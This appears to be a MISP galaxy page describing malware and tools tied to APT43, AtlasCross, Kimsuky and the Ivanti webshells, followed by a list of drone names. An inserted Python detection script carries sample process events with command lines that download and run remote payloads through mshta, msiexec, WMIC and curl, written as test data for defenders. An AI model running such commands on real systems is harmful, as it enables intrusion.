https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

EGGHATCH

EGGHATCH is a C/C++ Windows downloader. It uses mshta.exe to download and execute a script. Availability: Non-public

The tag is: misp-galaxy:tool="EGGHATCH"

EGGHATCH has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16790. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

GOLDDROP

GOLDDROP is a C/C++ Windows dropper. It decrypts a resource file, saves it to the file system, and injects it into another process. Availability: Non-public

The tag is: misp-galaxy:tool="GOLDDROP"

GOLDDROP has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16791. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

GOLDSMELT

GOLDSMELT is a C/C++ utility used to close the rundll32.exe process and delete a file likely used for logs. Availability: Non-public

The tag is: misp-galaxy:tool="GOLDSMELT"

GOLDSMELT has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16792. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

Invoke-Mimikatz

Invoke-Mimikatz is a PowerShell script that reflectively loads a Mimikatz credential-stealing DLL into memory. Availability: Public

The tag is: misp-galaxy:tool="Invoke-Mimikatz"

Invoke-Mimikatz has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="Mimikatz" with estimative-language:likelihood-probability="likely"

Table 16793. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

JURASSICSHELL

JURASSICSHELL is a PHP file management web shell that allows the actor to download and upload files. Availability: Non-public

The tag is: misp-galaxy:tool="JURASSICSHELL"

JURASSICSHELL has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16794. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

LANDMARK

LANDMARK is a C/C++ Windows launcher that loads and executes a file on disk stored as desktop.r5u. Availability: Non-public

The tag is: misp-galaxy:tool="LANDMARK"

LANDMARK is also known as:

  • LANDMARK.NET

LANDMARK has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16795. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

LATEOP

LATEOP is a data-mining Visual Basic script that can enumerate a variety of characteristics of a target system as well as execute additional arbitrary Visual Basic content. Some deployments of LATEOP have led to the download and execution of the PASSMARK credential theft payload. In contrast, some deployments of LATEOP.v2 have originated from BENCHMARK-sourced infections. Availability: Non-public

The tag is: misp-galaxy:tool="LATEOP"

LATEOP is also known as:

  • LATEOP.V2

LATEOP has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16796. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

LONEJOGGER

LONEJOGGER is a downloader/dropper which has been observed targeting cryptocurrency services (including exchanges and investment companies), and uses a .lnk shortcut to download guardrailed HTML Application payloads. Availability: Non-public

The tag is: misp-galaxy:tool="LONEJOGGER"

LONEJOGGER has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16797. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

PASSMARK

PASSMARK is a credential harvester that steals usernames and passwords from web browsers and email applications. PASSMARK is likely derived from the tool PassView. Availability: Public

The tag is: misp-galaxy:tool="PASSMARK"

PASSMARK has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16798. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

PENCILDOWN

PENCILDOWN is a C/C++ Windows based downloader. PENCILDOWN collects basic system information and sends it to the C2 server before receiving the next stage. The next stage is then loaded in memory or executed directly based off a flag in the response. Availability: Non-public

The tag is: misp-galaxy:tool="PENCILDOWN"

PENCILDOWN is also known as:

  • PENCILDOWN.ANDROID

PENCILDOWN has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16799. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

PENDOWN

PENDOWN is a downloader written in C++ that retrieves a payload via HTTP. The downloaded file is saved to disk and executed. Availability: Non-public

The tag is: misp-galaxy:tool="PENDOWN"

PENDOWN has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16800. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

PUMPKINBAR

PUMPKINBAR is a C/C++ dropper. PUMPKINBAR can contain multiple payloads encoded and embedded within itself. The key to decode each payload is appended at the end of the PUMPKINBAR executable. The payloads are dropped to disk and executed. Availability: Non-public

The tag is: misp-galaxy:tool="PUMPKINBAR"

PUMPKINBAR has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16801. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

SLIMCURL

SLIMCURL is a C/C++ downloader. It contains the next stage as a Base64 encoded Google Drive link. The next stage is downloaded using cURL. Availability: Non-public

The tag is: misp-galaxy:tool="SLIMCURL"

SLIMCURL has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16802. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report
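Four of the downloaders on this page drive a signed Windows utility to fetch the next stage: WasabiSeed through Windows Installer, EGGHATCH through mshta.exe, COINTOSS through WMIC over FTP, and SLIMCURL through cURL against a Google Drive link. That makes the process tree, not the payload, the thing to alert on. The detection logic below is an added example written for this page, not code from Proofpoint's or Mandiant's reports; the process-creation events are constructed placeholders with Sysmon-style field names, and the exact command-line syntax each family uses is an assumption drawn from the descriptions above:

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    image: str                   # spawned process, lower-case file name
    cmdline: "re.Pattern[str]"   # must match the command line
    parents: tuple = ()          # if non-empty, the parent's file name must be one of these


def _base(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


RULES = (
    Rule("WasabiSeed: script host drives msiexec to a remote MSI",
         "msiexec.exe", re.compile(r'/i\s+"?https?://', re.I),
         ("wscript.exe", "cscript.exe")),
    Rule("EGGHATCH: mshta fetches and runs a remote script",
         "mshta.exe", re.compile(r"https?://", re.I)),
    Rule("COINTOSS: WMIC pulls a payload over FTP",
         "wmic.exe", re.compile(r"ftp://", re.I)),
    Rule("SLIMCURL: curl retrieves a stage from Google Drive",
         "curl.exe", re.compile(r"drive\.google\.com", re.I)),
)


def match_rules(event: dict, rules=RULES) -> list:
    """Names of the rules one process-creation event matches. The event carries
    the Sysmon Event ID 1 fields Image, ParentImage and CommandLine."""
    image, parent = _base(event["Image"]), _base(event.get("ParentImage", ""))
    hits = []
    for rule in rules:
        if image != rule.image:
            continue
        if rule.parents and parent not in rule.parents:
            continue
        if rule.cmdline.search(event.get("CommandLine", "")):
            hits.append(rule.name)
    return hits


def scan(events, rules=RULES) -> list:
    """Evaluate every event; return (rule name, command line) pairs that fired."""
    return [(name, ev.get("CommandLine", ""))
            for ev in events for name in match_rules(ev, rules)]


# Constructed sample telemetry (not real events); hosts, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'msiexec.exe /i http://203.0.113.10/update.msi /qn'},
    {"Image": r"C:\Windows\System32\msiexec.exe",          # benign local install, must not fire
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i C:\Users\alice\Downloads\7zip.msi'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'mshta.exe http://203.0.113.10/s.hta'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic os get /format:"ftp://203.0.113.10/p.xsl"'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'curl.exe -L -o C:\Users\Public\u.dat "https://drive.google.com/uc?id=PLACEHOLDER"'},
]


if __name__ == "__main__":
    for name, cmd in scan(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

The parent constraint on the msiexec rule is what keeps ordinary software installs quiet; the other three patterns are rare enough in most fleets that a URL in the command line is sufficient on its own, but expect to tune the curl rule where Google Drive is a sanctioned file-sharing channel.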

SPICYTUNA

SPICYTUNA is a VBA downloader. It collects basic system information and is capable of downloading and executing additional stages. Availability: Non-public

The tag is: misp-galaxy:tool="SPICYTUNA"

SPICYTUNA has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16803. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

SWEETDROP

SWEETDROP is a C/C++ Windows dropper. It drops an embedded binary resource to the file system and executes it. Availability: Non-public

The tag is: misp-galaxy:tool="SWEETDROP"

SWEETDROP has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16804. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

VENOMBITE

VENOMBITE is a C/C++ Windows downloader that has evolved from PENDOWN. It uses the same custom encoding routine, but the network functionality has been moved to an embedded executable. The downloaded file is loaded and executed in memory. Availability: Non-public

The tag is: misp-galaxy:tool="VENOMBITE"

VENOMBITE has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16805. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

DarkGate

First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.

The tag is: misp-galaxy:tool="DarkGate"

DarkGate is also known as:

  • Meh

Table 16806. Table References

Links

https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/

https://www.aon.com/cyber-solutions/aon_cyber_labs/darkgate-keylogger-analysis-masterofnone/

https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/

https://www.zerofox.com/blog/the-underground-economist-volume-3-issue-12/

https://decoded.avast.io/janrubin/meh-2-2/

https://decoded.avast.io/janrubin/complex-obfuscation-meh/

https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign

DangerAds

DangerAds is a loader Trojan used by AtlasCross in this activity. Its main function is to fingerprint the host environment and execute a built-in shellcode in its own process; the shellcode then loads and runs the follow-on Trojan.

DangerAds places its main malicious code in the HelpText method of a .NET DLL, so it starts when an external program invokes Help from that DLL. Before the main malicious functions run, DangerAds collects the user name and local domain name of the host, and it continues only if one of the two contains the keyword "danger" or "ads-wcf". The attack can therefore be judged a targeted one, aimed at a domain or user name containing "ads-wcf".

The main body of the malicious code checks whether the process is 32- or 64-bit and selectively decrypts and executes an x86 or x64 shellcode. DangerAds decrypts with a multi-byte XOR, and the shellcode is loaded directly in the process. In the shellcode stage, DangerAds uses the open-source sRDI scheme (https://github.com/monoxgas/sRDI/blob/master/shellcodeRDI/shellcodeRDI.c) to load and execute DLLs: the shellcode loads the DLL appended at its tail and calls the export function EnumWinEvent. The DLL loaded by this shellcode is the AtlasAgent Trojan developed by AtlasCross.

The tag is: misp-galaxy:tool="DangerAds"

DangerAds has relationships with:

  • used-by: misp-galaxy:threat-actor="AtlasCross" with estimative-language:likelihood-probability="likely"

  • executes: misp-galaxy:tool="AtlasAgent" with estimative-language:likelihood-probability="likely"

Table 16807. Table References

Links

https://nsfocusglobal.com/warning-newly-discovered-apt-attacker-atlascross-exploits-red-cross-blood-drive-phishing-for-cyberattack/

AtlasAgent

AtlasAgent, used in this attack activity, is a Trojan program developed by AtlasCross. Its main functions are to collect host and process information, prevent multiple instances of itself from running, inject a specified shellcode, and download files from the C2 servers. The Trojan communicates with the C2 over HTTP, protects communication data with RC4 encryption followed by Base64 encoding, and obfuscates key API names with two encryption methods at the same time.

The tag is: misp-galaxy:tool="AtlasAgent"

AtlasAgent has relationships with:

  • used-by: misp-galaxy:threat-actor="AtlasCross" with estimative-language:likelihood-probability="likely"

  • executed-by: misp-galaxy:tool="DangerAds" with estimative-language:likelihood-probability="likely"

Table 16808. Table References

Links

https://nsfocusglobal.com/warning-newly-discovered-apt-attacker-atlascross-exploits-red-cross-blood-drive-phishing-for-cyberattack/

RDP Wrapper

Open-source library that enables Remote Desktop Host functionality on Windows editions that do not officially support it.

The tag is: misp-galaxy:tool="RDP Wrapper"

RDP Wrapper has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 16809. Table References

Links

https://asec.ahnlab.com/en/57873/

TightVNC

Open-source VNC remote-desktop tool.

The tag is: misp-galaxy:tool="TightVNC"

TightVNC has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 16810. Table References

Links

https://asec.ahnlab.com/en/57873/

RevClient

Malware

The tag is: misp-galaxy:tool="RevClient"

RevClient has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 16811. Table References

Links

https://asec.ahnlab.com/en/57873/

Colibri Loader

Colibri Loader is a piece of malware that first appeared on underground forums in August 2021 and was advertised to "people who have large volumes of traffic and lack of time to work out the material". As its name suggests, it is meant to deliver and manage payloads on infected computers.

The tag is: misp-galaxy:tool="Colibri Loader"

Colibri Loader has relationships with:

  • delivers: misp-galaxy:stealer="Mars Stealer" with estimative-language:likelihood-probability="very-likely"

Table 16812. Table References

Links

https://www.malwarebytes.com/blog/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique

BUSHWALK

A mitigation bypass technique was recently identified that led to the deployment of a custom webshell tracked as BUSHWALK. Successful exploitation bypasses the initial mitigation provided by Ivanti on Jan. 10, 2024. At this time, Mandiant assesses that the mitigation bypass activity is highly targeted and limited, and is distinct from the post-advisory mass exploitation activity. BUSHWALK is written in Perl and is embedded into a legitimate Connect Secure (CS) file, querymanifest.cgi. BUSHWALK gives a threat actor the ability to execute arbitrary commands or write files on the server. BUSHWALK executes its malicious Perl function, validateVersion, if the web request’s platform parameter is SafariiOS. It uses Base64 and RC4 to decode and decrypt the threat actor’s payload in the web request’s command parameter.

The tag is: misp-galaxy:tool="BUSHWALK"

Table 16813. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

LIGHTWIRE

The original LIGHTWIRE webshell sample contains a simpler obfuscation routine: it initializes an RC4 object and then immediately uses that object to decrypt the issued command.

Mandiant has identified an additional variant of the LIGHTWIRE web shell that inserts itself into a legitimate component of the VPN gateway, compcheckresult.cgi. The new sample uses the same GET parameters as the original LIGHTWIRE sample.

The new variant of LIGHTWIRE features a different obfuscation routine. It first assigns a string scalar to the variable $useCompOnly. Next, it uses the Perl tr operator to transform that string with a character-by-character translation. The resulting key is then Base64-decoded and used to RC4-decrypt the incoming request. Finally, the issued command is executed by calling eval.

The tag is: misp-galaxy:tool="LIGHTWIRE"

Table 16814. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

CHAINLINE

CHAINLINE is a Python webshell backdoor embedded in an Ivanti Connect Secure Python package that enables arbitrary command execution.

CHAINLINE was identified in the CAV Python package at the following path: /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/health.py. This is the same Python package that was modified to support the WIREFIRE web shell.

Unlike WIREFIRE, which modifies an existing file, CHAINLINE creates a new file called health.py, which is not a legitimate filename in the CAV Python package. The existence of this filename, or of an associated compiled Python cache file, may indicate the presence of CHAINLINE.

UNC5221 registered a new API resource path to support access to CHAINLINE at the REST endpoint /api/v1/cav/client/health. This was accomplished by importing the maliciously created Health API resource and then calling the add_resource() method on the Flask-RESTful Api object within /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/init.py.

The tag is: misp-galaxy:tool="CHAINLINE"

Table 16815. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

FRAMESTING

FRAMESTING is a Python webshell embedded in an Ivanti Connect Secure Python package that enables arbitrary command execution.

FRAMESTING was identified in the CAV Python package at the following path: /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py. Note that this is the same Python package that was modified to support the WIREFIRE and CHAINLINE web shells.

Once installed, the threat actor can access the FRAMESTING web shell at the REST endpoint /api/v1/cav/client/categories with a POST request. Note that the legitimate categories endpoint only accepts GET requests.

The web shell employs two methods of accepting commands from an attacker. It first attempts to retrieve the command stored in the value of a cookie named DSID in the current HTTP request. If the cookie is not present or is not of the expected length, it attempts to decompress zlib data within the request’s POST body. Lastly, FRAMESTING passes the decoded POST data to a Python exec() statement to dynamically execute additional Python code.

Note that DSID is also the name of a cookie used by Ivanti Connect Secure appliances to maintain user VPN sessions. FRAMESTING likely uses the same cookie name to blend in with legitimate network traffic.

The tag is: misp-galaxy:tool="FRAMESTING"

Table 16816. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

IMPACKET

IMPACKET is a Python library that allows for interaction with various network protocols. It is particularly effective in environments that rely on Active Directory and related Microsoft Windows network services.

The tag is: misp-galaxy:tool="IMPACKET"

Table 16817. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

IODINE

IODINE is a network traffic tunneler that allows for tunneling of IPv4 traffic over DNS.

The tag is: misp-galaxy:tool="IODINE"

Table 16818. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

ENUM4LINUX

ENUM4LINUX is a Linux Perl script for enumerating data from Windows and Samba hosts.

The tag is: misp-galaxy:tool="ENUM4LINUX"

Table 16819. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

UAVs/UCAVs

Unmanned Aerial Vehicles / Unmanned Combat Aerial Vehicles.

UAVs/UCAVs is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Enes AYATA

R18

R18

The tag is: misp-galaxy:uavs="R18"

KBLA-IVT

KBLA-IVT

The tag is: misp-galaxy:uavs="KBLA-IVT"

Autel Evo II

Autel Evo II

The tag is: misp-galaxy:uavs="Autel Evo II"

DJI Mavic Series

DJI Mavic Series

The tag is: misp-galaxy:uavs="DJI Mavic Series"

Golden Eagle

Golden Eagle

The tag is: misp-galaxy:uavs="Golden Eagle"

Skydio X2

Skydio X2

The tag is: misp-galaxy:uavs="Skydio X2"

RQ-4 Global Hawk

RQ-4 Global Hawk

The tag is: misp-galaxy:uavs="RQ-4 Global Hawk"

Orion

Orion

The tag is: misp-galaxy:uavs="Orion"

Bayraktar TB2

Bayraktar TB2

The tag is: misp-galaxy:uavs="Bayraktar TB2"

UJ-22 Airborne

UJ-22 Airborne

The tag is: misp-galaxy:uavs="UJ-22 Airborne"

Forpost

Forpost

The tag is: misp-galaxy:uavs="Forpost"

Zala 421

Zala 421

The tag is: misp-galaxy:uavs="Zala 421"

PD-1 People’s Drone

PD-1 People’s Drone

The tag is: misp-galaxy:uavs="PD-1 People’s Drone"

Tupolev Tu-141 Strizh

Tupolev Tu-141 Strizh

The tag is: misp-galaxy:uavs="Tupolev Tu-141 Strizh"

WB FlyEye

WB FlyEye

The tag is: misp-galaxy:uavs="WB FlyEye"

Granat-4

Granat-4

The tag is: misp-galaxy:uavs="Granat-4"

Orlan-10

Orlan-10

The tag is: misp-galaxy:uavs="Orlan-10"

Orlan-30

Orlan-30

The tag is: misp-galaxy:uavs="Orlan-30"

Quantum Systems Vector

Quantum Systems Vector

The tag is: misp-galaxy:uavs="Quantum Systems Vector"

Spectator

Spectator

The tag is: misp-galaxy:uavs="Spectator"

RQ-20 Puma

RQ-20 Puma

The tag is: misp-galaxy:uavs="RQ-20 Puma"

E95

E95

The tag is: misp-galaxy:uavs="E95"

Tupolev Tu-143 Reis

Tupolev Tu-143 Reis

The tag is: misp-galaxy:uavs="Tupolev Tu-143 Reis"

Zastava

Zastava

The tag is: misp-galaxy:uavs="Zastava"

Punisher

Punisher

The tag is: misp-galaxy:uavs="Punisher"

Mini-Bayraktar

Mini-Bayraktar

The tag is: misp-galaxy:uavs="Mini-Bayraktar"

Takion

Takion

The tag is: misp-galaxy:uavs="Takion"

Leleka-100 “Stork”

Leleka-100 “Stork”

The tag is: misp-galaxy:uavs="Leleka-100 “Stork”"

Athlon Avia A1-CM Furia

Athlon Avia A1-CM Furia

The tag is: misp-galaxy:uavs="Athlon Avia A1-CM Furia"

Eleron-3

Eleron-3

The tag is: misp-galaxy:uavs="Eleron-3"

AeroVironment Quantix

AeroVironment Quantix

The tag is: misp-galaxy:uavs="AeroVironment Quantix"

Switchblade 300

Switchblade 300

The tag is: misp-galaxy:uavs="Switchblade 300"

Switchblade 600

Switchblade 600

The tag is: misp-galaxy:uavs="Switchblade 600"

Phoenix Ghost

Phoenix Ghost

The tag is: misp-galaxy:uavs="Phoenix Ghost"

WB Group Warmate

WB Group Warmate

The tag is: misp-galaxy:uavs="WB Group Warmate"

Zala KYB

Zala KYB

The tag is: misp-galaxy:uavs="Zala KYB"